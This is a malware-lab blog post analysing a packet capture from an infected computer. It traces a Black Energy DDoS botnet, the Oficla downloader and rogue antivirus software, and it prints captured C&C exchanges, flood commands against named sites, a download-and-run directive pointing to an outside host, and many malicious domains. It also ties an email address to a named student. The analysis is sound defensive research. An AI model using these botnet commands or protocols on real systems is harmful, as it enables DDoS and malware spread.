Russian Malware Bundle



by Nart Villeneuve

This Malware Lab blog post analyzes a packet capture file from an infected computer associated with a political figure. While evidence of compromise was found, the malware infection is most likely unrelated to political activities and was not a targeted attack. Rather, the infection is related to the criminal activities of attackers based in Russia or Ukraine.

Key findings:

  • From the malware connections recorded in the packet capture file we were able to discover malware that bundled a Black Energy bot with the “Oficla/Sasfis” Trojan downloader as well as known rogue/fake anti-virus software.
  • We were able to access an interface to the Black Energy botnet that was not secured and observed the attackers conduct a brief DDoS attack.
  • Despite being a Russian botnet, many of the domain names were .cn and many IP addresses were Chinese.
  • This network is linked with an operation that spams nearly 4.3 million email addresses with gambling, pornography, pharmaceuticals, rogue AV software and other malware. It is also linked with an iframe injection campaign.

Background

In 2008, Steven Adair, from Shadowserver, noted that the Black Energy botnet was moving beyond just DDoS attacks to other areas of cybercrime.

Black Energy this year went from just DDOSing to spreading keyloggers to steal credentials and passwords, Adair says. Like other botnets, it has been updating itself with new malware.1

In fact this appears to be the case for a variety of botnets. Dancho Danchev states that groups that used to specialize in DDoS attacks are “‘vertically integrating’ in order to occupy as many underground market segments as possible.”2

Another interesting observation by Danchev, that is supported by this investigation, is that DDoS vendors are attacking non-political sites in order to avoid drawing attention to themselves. Danchev explains:

It’s also worth pointing out that a huge number of “boutique vendors” of DDoS services remain reluctant to initiate DDoS attacks against government or political parties, in an attempt to stay beneath the radar. This mentality prompted the inevitable development of “aggregate-and-forget” type of botnets exclusively aggregated for customer-tailored propositions who would inevitably get detected, shut down, but end up harder to trace back to the original source compared to a situation where they would DDoS the requested high-profile target from the very same botnet that is closely monitored by the security community.3

Instead, they focus on extortion schemes in which they charge for a protection racket (to not DDoS a web site) as well as encouraging “protected” sites to DDoS their competitors.

Now that various attacker groups have diversified it is difficult to distinguish their activities from one another. Different groups propagate each other’s malware or use what FireEye calls a “BotnetWeb,” which is defined as:

A collection of heterogeneous Botnets being operated in conjunction with each other controlled by one or more closely linked cyber criminal group(s).4

Some of this may be the result of splintering among more well established groups. The ThreatFire blog suggests that the Storm group has broken into several groups with some now teaming up with rogue AV’s.5 This realignment of criminal actors may partially explain the diversification of malware.

However, there also appears to be a significant role for “middlemen” who simply propagate content, whether it be advertisements, iframe injection, rogue AV’s, or botnet software.

Packet Capture

The packet capture from the infected computer shows a variety of malware activity. While the malware activity may be related, there appear to be different types.

The infected computer connected to four control servers:

sexigood.ru (daro-x@yandex.ru)
81.176.232.103 – NEOWEB HOSTING, RU

091809.ru (bazhenov@mail.ru)
210.51.166.238 – China Netcom, CN

zflaersroot.cn (tem.ponakuru@mail.ru)
210.51.166.233 – China Netcom, CN

moneybizness.ru (belov@pisem.net)
210.51.10.184 – China Netcom, CN

The captured network traffic shows a connection from the infected computer to sexigood.ru (81.176.232.103), from which a file “R23.exe” is downloaded.

GET /1/R23.exe HTTP/1.0
Host: sexigood.ru

An automated analysis of “R23.exe” by ThreatExpert shows that connections are issued to 091809.ru (210.51.166.238) and zflaersroot.cn (210.51.166.233) as well as core2724.openbiglibrarynow.com (94.125.90.163).6 However, the captured network traffic from the infected computer does not show any connections to core2724.openbiglibrarynow.com (94.125.90.163, IntTranspNet, RU).

Black Energy

Black Energy is a botnet toolkit whose primary functionality is Distributed Denial of Service (DDoS) attacks. The bots communicate with the command and control server over HTTP. It is used by Russian hackers, and Black Energy botnet kits can be purchased for about $40. There are at least 30 distinct Black Energy botnets.7 According to Arbor Networks, Black Energy botnets were used in the DDoS attack on Georgia in 2008.8

The captured network traffic from the infected computer shows a connection to 091809.ru (210.51.166.238) that is a check-in:

POST /1/stat.php HTTP/1.0
Host: 091809.ru
id=x----------_382C0098&build_id=.8

HTTP/1.1 200 OK
MTA7MjAwMDsxMDsxOzI7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI3dhaXQjMTAjeC0tLS0tLS0tLS1fMzgyQzAwOTg=

The response from the C&C is base64 encoded, when decoded it is:

10;2000;10;1;2;30;100;3;20;1000;2000#wait#10#x----------_382C0098
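As an added example (not code from the original post), the following Python decodes a check-in response of this shape and correlates it with the POST body that preceded it, which is a simple way to pick Black Energy traffic out of a capture. The meaning of the eleven numeric fields is not given here and they are left unlabelled; that the flood commands quoted later occupy the same slot as “wait” is my assumption.

```python
import base64
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Constructed copies of the check-in exchange quoted above: the bot POSTs its
# id and build_id, and the C&C answers with a single base64 blob.
CHECKIN_BODY = "id=x----------_382C0098&build_id=.8"
RESPONSE_B64 = ("MTA7MjAwMDsxMDsxOzI7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI3dhaXQjMTAj"
                "eC0tLS0tLS0tLS1fMzgyQzAwOTg=")


@dataclass
class BeResponse:
    params: list        # numeric fields; their meaning is not given on the page
    command: str        # "wait", or e.g. "flood http <target> [<path>]"
    interval: int       # third '#'-separated field
    bot_id: str         # echoes the id the bot sent in its POST
    targets: list = field(default_factory=list)


def parse_checkin(body):
    """Return the id/build_id pairs from the bot's POST body."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def parse_decoded(raw):
    """Parse the plaintext layout <params>#<command>#<interval>#<bot_id>."""
    parts = raw.split("#")
    if len(parts) != 4:
        raise ValueError("unexpected Black Energy response layout: %r" % raw)
    params = [int(p) for p in parts[0].split(";") if p != ""]
    command = parts[1].strip()
    resp = BeResponse(params, command, int(parts[2]), parts[3])
    # Assumption: flood commands arrive in the slot that holds "wait" above.
    tokens = command.split()
    if len(tokens) >= 3 and tokens[0] == "flood":
        resp.targets = tokens[2:]      # e.g. ["www.vernem-prava.ru", "index.html"]
    return resp


def parse_response(b64):
    """Base64-decode the C&C reply and parse it."""
    return parse_decoded(base64.b64decode(b64).decode("ascii"))


def matches_checkin(body, b64):
    """True when the C&C echoes the id the bot sent: a cheap correlation check."""
    return parse_checkin(body).get("id") == parse_response(b64).bot_id


def is_active_attack(resp):
    """True when the bot has been handed a flood command rather than 'wait'."""
    return resp.command.startswith("flood")


if __name__ == "__main__":
    r = parse_response(RESPONSE_B64)
    print(r.command, r.bot_id, matches_checkin(CHECKIN_BODY, RESPONSE_B64))
```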

Further analysis of the Black Energy control server at 091809.ru (210.51.166.238) revealed the command interface that the attacker uses to issue commands to infected computers. According to the statistics in the interface the attackers had 2044 active bots, an average of 2418 per hour and 8105 per day. In total the attackers recorded 64346 infections.

[image: bundle1]

Further investigation revealed the command interface for another Black Energy control server on the same IP address, sexiland.ru (210.51.166.238, China Netcom) was also accessible. According to the statistics in the interface the attackers had 3623 active bots, an average of 4869 per hour and 12749 per day. In total the attackers recorded 51813 infections.

[image: bundle2]

During the investigation the attackers began a DDoS attack against “81.176.239.67” with the command:

flood http 81.176.239.67

The IP address is assigned to “Erix colocation and vps service” in Moscow, Russia, and the only domain we found that resolved to this IP address is vernem-prava.ru, which appears to be a web site selling services to obtain Russian driver’s licenses. The command was changed back to “wait” shortly thereafter.

[image: bundle3]

Several minutes later the following command was issued on both Black Energy control servers, which had a total of 5387 active bots at the time.

flood http www.vernem-prava.ru index.html

We also observed both command and control servers issue additional DDoS commands:

flood http besticq.ru
flood http www.newkaliningrad.ru forum
flood http wepn.ru
flood http 212.112.224.168

(The version of Black Energy running on these servers appears to be 1.7 as new files introduced with Black Energy 1.8 do not appear on these servers.9)

Oficla/Sasfis

After the connection to 091809.ru, there was a connection to zflaersroot.cn (210.51.166.233) where the infected computer is directed to download “bot.exe” from moneybizness.ru (210.51.10.184):

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1 HTTP/1.1
Host: zflaersroot.cn

HTTP/1.1 200 OK
[info]runurl:http://moneybizness.ru/bot.exe|taskid:43|delay:30|upd:0|backurls:[/info]

An automated analysis of “bot.exe” shows that it connects to 091809.ru (210.51.166.238).10 Follow-up requests to zflaersroot.cn (210.51.166.233) instructed the infected computer to “delay.”

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1&tid=43&r=1 HTTP/1.1
Host: zflaersroot.cn

HTTP/1.1 200 OK
[info]kill:0|delay:30|upd:0|backurls:[/info]

This behaviour is identical to Win32/Oficla, a trojan downloader.11 In this case the Oficla downloader instructs the infected computer to download “bot.exe,” which connects to the Black Energy control server.
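The Oficla task and idle responses above, parsed as an added example (not code from the original post), together with the beacon requests that preceded them. The field names are taken from the quoted responses; that the “tid” on the follow-up beacon echoes the “taskid” the controller handed out is my reading of the two requests, not something the post states.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed copies of the two responses and two beacon URLs quoted above.
TASK_RESPONSE = ("[info]runurl:http://moneybizness.ru/bot.exe|taskid:43|delay:30"
                 "|upd:0|backurls:[/info]")
IDLE_RESPONSE = "[info]kill:0|delay:30|upd:0|backurls:[/info]"
FIRST_BEACON = "/tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1"
REPORT_BEACON = "/tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1&tid=43&r=1"

INFO_RE = re.compile(r"\[info\](.*?)\[/info\]", re.S)


def parse_oficla_response(body):
    """Split the [info]...[/info] block into a key/value dict; None if absent."""
    m = INFO_RE.search(body)
    if m is None:
        return None
    fields = {}
    for item in m.group(1).split("|"):
        key, sep, value = item.partition(":")   # first ':' only, so "http://" survives
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def summarize_task(fields):
    """Reduce the raw fields to what the bot was told to do."""
    if fields is None:
        return {"action": "unknown"}
    return {
        "action": "download" if fields.get("runurl") else "idle",
        "url": fields.get("runurl") or None,
        "taskid": int(fields["taskid"]) if "taskid" in fields else None,
        "delay": int(fields["delay"]) if "delay" in fields else None,
        "kill": fields.get("kill"),      # kept as the raw string the C&C sent
        "upd": fields.get("upd"),
    }


def parse_beacon(path):
    """Return the bot's query parameters from a bb.php request path."""
    return {k: v[0] for k, v in parse_qs(urlparse(path).query).items()}


def acknowledged_task(task_body, report_path):
    """Assumption: the follow-up beacon's 'tid' echoes the 'taskid' it was given."""
    task = summarize_task(parse_oficla_response(task_body))
    beacon = parse_beacon(report_path)
    return task.get("taskid") is not None and beacon.get("tid") == str(task["taskid"])


if __name__ == "__main__":
    print(summarize_task(parse_oficla_response(TASK_RESPONSE)))
    print(acknowledged_task(TASK_RESPONSE, REPORT_BEACON))
```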

Rogue AV’s

The malware file “R23.exe,” which the original infected computer downloaded from sexigood.ru (81.176.232.103), connected to 091809.ru (210.51.166.238), the Black Energy control server, and to zflaersroot.cn (210.51.166.233), the Oficla/Sasfis control server, as well as to a URL associated with rogue/fake antivirus software.12

hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=1&a=2724
hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=3&a=2724
hxxp://core2724.openbiglibrarynow.com/stget2.cgi?host=host&id=2724

In fact, there were additional malware files in the same directory as “R23.exe” on sexigood.ru (81.176.232.103) including “8.exe,”13 “R31.exe”14 and “Windows_Protector.exe.”15 An analysis of “Windows_Protector.exe” showed that it downloaded another file named “PC_protect.exe” from core2724.openbiglibrarynow.com (95.211.26.5, NL-LEASEWEB, NL).16

This URL was also found in hxxp://scanyourpc-fastx.com/pdm/x.exe and “Windows_Protector.exe.” The “x.exe” file17 from scanyourpc-fastx.com (89.208.41.253, DINETHOSTING, RU) connects to d45648675.cn (91.212.226.60) and begins an SSL encrypted session.
The files that were on sexigood.ru (81.176.232.103) were replaced with “Bee.dll,”18 “ked.exe,”19 “win2ext.exe,”20 and “Windows_Protector.exe.”21 The “win2ext.exe” file connected to www.guruman.cn (210.51.181.69, E-Icann, China Netcom, CN) and perenils.cn (91.212.220.143, Group Vertical Ltd, RU).

“rundll32”

There were some connections, which appeared to be unrelated to the malware analyzed above, requesting “/toolbarprofit/images/body_bg_bot.jpg” from the IP address “66.197.149.41” (Network Operations Center Inc., US) with the host header “www.pay-per-install.info.” These connections are redirected to “www.fbi.gov.”27 Software that connects to the IP address “66.197.149.41” is under review by PrevX.22

GET /toolbarprofit/images/body_bg_bot.jpg HTTP/1.0
Referer: http://www.pay-per-install.info/
Host: www.pay-per-install.info

HTTP/1.1 301 Moved Permanently
Server: nginx
Location: http://www.fbi.gov/

The domain “www.pay-per-install.info” resolves to “127.0.0.1” and is an alias for “ddos.fuckingtest.net.”

$ host www.pay-per-install.info
www.pay-per-install.info is an alias for ddos.fuckingtest.net.
ddos.fuckingtest.net has address 127.0.0.1

Searches focused on “toolbarprofit” yielded an individual known as “rundll32” using the email address “toolbarprofit@gmail.com” and the ICQ number “561194042.”

[image: bundle4]

There is a post by “rundll32” that advertises an “affiliate” program that is “not detected by any antivirus.” In this post “rundll32” advertises the ICQ number “551802661” and the website “rundll32.ru.” The same text has been posted on a variety of Russian hacker forums.23

[image: bundle5]

While rundll32.ru resolves to 95.211.27.177 (NL-LEASEWEB, NL), www.rundll32.ru exhibits the same behaviour as www.pay-per-install.info:

$ host www.rundll32.ru
www.rundll32.ru is an alias for ddos.fuckingtest.net.
ddos.fuckingtest.net has address 127.0.0.1

Our investigation then focused on the email address, “rundll32@yandex.ru”, which was used to register rundll32.ru. A search for “rundll32@yandex.ru” returns a paper written by Alexander V. Prokhorov (or Prochorov), a student at Moscow State University, Russia.

[image: bundle6]

The same search also returned a server that is being used for spam as well as iframe injection. In fact, “rundll32@yandex.ru” appears on a large spam list of 4,288,450 email addresses. There were a variety of templates as well as tools for sending spam located on the server across the following domains, all of which are hosted on the same IP address (216.120.237.31, HostRocket Web Services, US): burkecoaching.com, rentaplayer.com, snowdomain.com, solutionmgmt.com, syattenterprises.com, trailingfirecards.com, noc8.com and strategymanagementinc.com.

[image: bundle7]

[image: bundle8]

In addition, we found a variety of redirects to various pornography sites as well as a pharmaceutical site, drugstopzap.com, and rogue AV sites. For example, the site, hxxp://destinybeijing.cn/?pid=156&sid=3f9ecd, redirects to hxxp://detect-spyware7.com/scan1/?pid=156&engine=pHT43Tj4NjEwMC4yMjkuNTYmdGltZT0xMjUuNYIMPAZM where the user is forced to download rogue AV software.24

[image: bundle9]

[image: bundle10]

[image: bundle11]

We also found that some pages redirected users to “counterweb.cn,” which is hosted on the same IP address, 210.51.166.238 (China Netcom, CN), as the Black Energy command and control servers 091809.ru and sexiland.ru. The connections to counterweb.cn were:

GET /t/out.php HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://counterweb.cn/sutra/in.cgi?default

GET /sutra/in.cgi?default HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://counterweb.cn/sutra/in.cgi?2

GET /sutra/in.cgi?2 HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://google.com

We also found a variety of malicious JavaScript and iframes that loaded the following URLs:

hxxp://000007.ru/in.cgi?7 (92.241.177.223, NETPLACE, RU)
hxxp://javascrlpt.com/s/in.cgi?8
hxxp://newsmeta.net/s/in.cgi?8 (213.163.89.35, Telos Solutions, NL)
hxxp://veryblomar.com/vb/in.cgi?2 (69.64.155.121, eNom, US)

The domain 000007.ru has been hosting “Windows_Protector.exe,” which is the rogue AV we also found on sexigood.ru (81.176.232.103).25 The domain javascrlpt.com was found serving Zeus related binaries from a Chinese IP address.26 All these domain names appear to have been used in iframe injection attacks.

Additional searches reveal web sites that contained similar scripts and tools as those used on the domains listed above including dark-studio.by.ru, erre-way.by.ru and www.exterv.com.

Storm

There was another connection of interest in our packet capture sample, to “78.159.121.122” (NETDIRECT-NET, DE), which is very similar to the connection between a Storm “supernode” and a “subcontroller” as described by SecureWorks’ Joe Stewart.29

POST /u/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Internet Explorer
Host: 78.159.121.122
Content-Length: 712
Pragma: no-cache

a=ZYCmeXPQwHEj9qGWsUqvzJf0nNCYaVvxlGKWOu3H4Gr[…]&b=RlzWZPqmoRdB1XyjNGfn1GC3n5KdXpmROtMz33ItiXrNIJyw[…]

HTTP/1.1 200 OK
Date: Tue, 13 Oct 2009 08:30:16 GMT
Server: Apache/2.2.11 (FreeBSD) PHP/5.2.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.9
Content-Length: 28
Connection: close
Content-Type: text/html

#���(NöÎ(5ëÊ9J#!švÝôÐpo°à¢Ëµ

According to Joe Stewart the “master” control server is often protected by another nginx server. However, the server on 78.159.121.122 appears to be Apache.

It is unclear if this is related to the malware “bundle” described in this post.

Notes

1 http://www.darkreading.com/security/management/showArticle.jhtml?articleID=211201241

2 http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html

3 http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html

4 http://blog.fireeye.com/research/2009/11/killing-the-beastpart-4.html

5 http://www.blogcatalog.com/blog/threatfire-research-blog/56298e2ced094ff86574560566e158a1

6 http://www.virustotal.com/analisis/46841255cd4e91cf93c74c539c13cf57beea6ec33c0c6502c2d14fb7182ce7ef-1256048818 and http://www.threatexpert.com/report.aspx?md5=6de4aeaca08b57339e2890a35c84a968

7 http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf

8 http://asert.arbornetworks.com/2009/01/russia-opposition-websites-and-ddos/

9 http://malerisch.net/docs/black_energy_ddos_1_8/blackenergy18.ppt

10 http://www.threatexpert.com/report.aspx?md5=78919f875e9cea75a491b8d620453d1b and http://www.virustotal.com/analisis/69ed9c0fdb9a0ac4631acba396cd22569a4670965017b6903cef050c63eaa0d6-1256051615

11 http://www.malwareurl.com/search.php?domain=&s=Oficla&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on and http://www.threatexpert.com/report.aspx?md5=8ba3f334d7c840c08317eed8274478d2

12 http://www.malwaredomainlist.com/mdl.php?search=openbiglibrarynow.com

13 http://www.virustotal.com/analisis/d32c1247b9cc80db7c50bd0b91d3a4d523672e9c238f99e1972b75d04340ab88-1255645683 and http://www.threatexpert.com/report.aspx?md5=0d431ffb676be2c091eda0445282b59e

14 http://www.virustotal.com/analisis/8e0df4b3e31afd1e73d68bdf7bb3f35c61d9d12cf35c0d36a8b0d98459b88b40-1255645829 and http://www.threatexpert.com/report.aspx?md5=4672d5000ea2ed47ff7089666bf18186

15 http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1255652491 and http://www.threatexpert.com/report.aspx?md5=43ec3ee7742dc809dc2690508b111ddf

16 The IP address changed.

17 http://www.virustotal.com/analisis/9d8ea6a2706f4a12c0fa78185811f31a9a64984d7f37667f73b7b5fba345a281-1256064976 and http://www.threatexpert.com/report.aspx?md5=18a5036b5855f40f8bf1bc37e7712115

18 http://www.virustotal.com/analisis/ab462e64ee3b87ef775ebd361e2290d02544aeb3df91c132a69c8cc3c7737d46-1256065684

19 http://www.virustotal.com/analisis/863f9a65b9496ce991a6a4d7d0cfd6260b290a59e16e14eab64ce2ac1a80836d-1256065745

20 http://www.virustotal.com/analisis/3cd06a2911f0b9e98b50dcb1148b7d12743a17b0c30ae707d240ba36b6f0e043-1256005930 and http://www.threatexpert.com/report.aspx?md5=7d73fe4a05fbc21a32fa620d92587102

21 http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1256016137

22 http://spywarefiles.prevx.com/RRDEFI44668732/ITUN~KA2.EXE.html and http://www.prevx.com/filenames/X824695795861965386-X1/LATEST5FUPDATE.EXE.html

23 http://forum.xakep.ru/m_1578962/mpage_1/key_/tm.htm#1578962 and http://74.125.95.132/search?q=cache:YeAN_Ax_3oMJ:secnull.ru/lofiversion/index.php/t2214.html+%22561194042%22&cd=10&hl=en&ct=clnk&gl=ca

24 http://www.virustotal.com/analisis/be2a26d07f7bdb14b72a1e21369744859bce7a77b820196a58c64bd4bf0c62ca-1256670552

25 http://www.malwaredomainlist.com/mdl.php?search=000007.ru

26 http://www.malwaredomainlist.com/mdl.php?search=javascrlpt.com

27 When connecting directly to the requested file, a 403 HTTP header is received, however, when connecting with “www.pay-per-install.info” as the host header the browser is redirected to www.fbi.gov.

28 http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ and http://news.cnet.com/8301-10789_3-10040669-57.html and https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

29 https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.
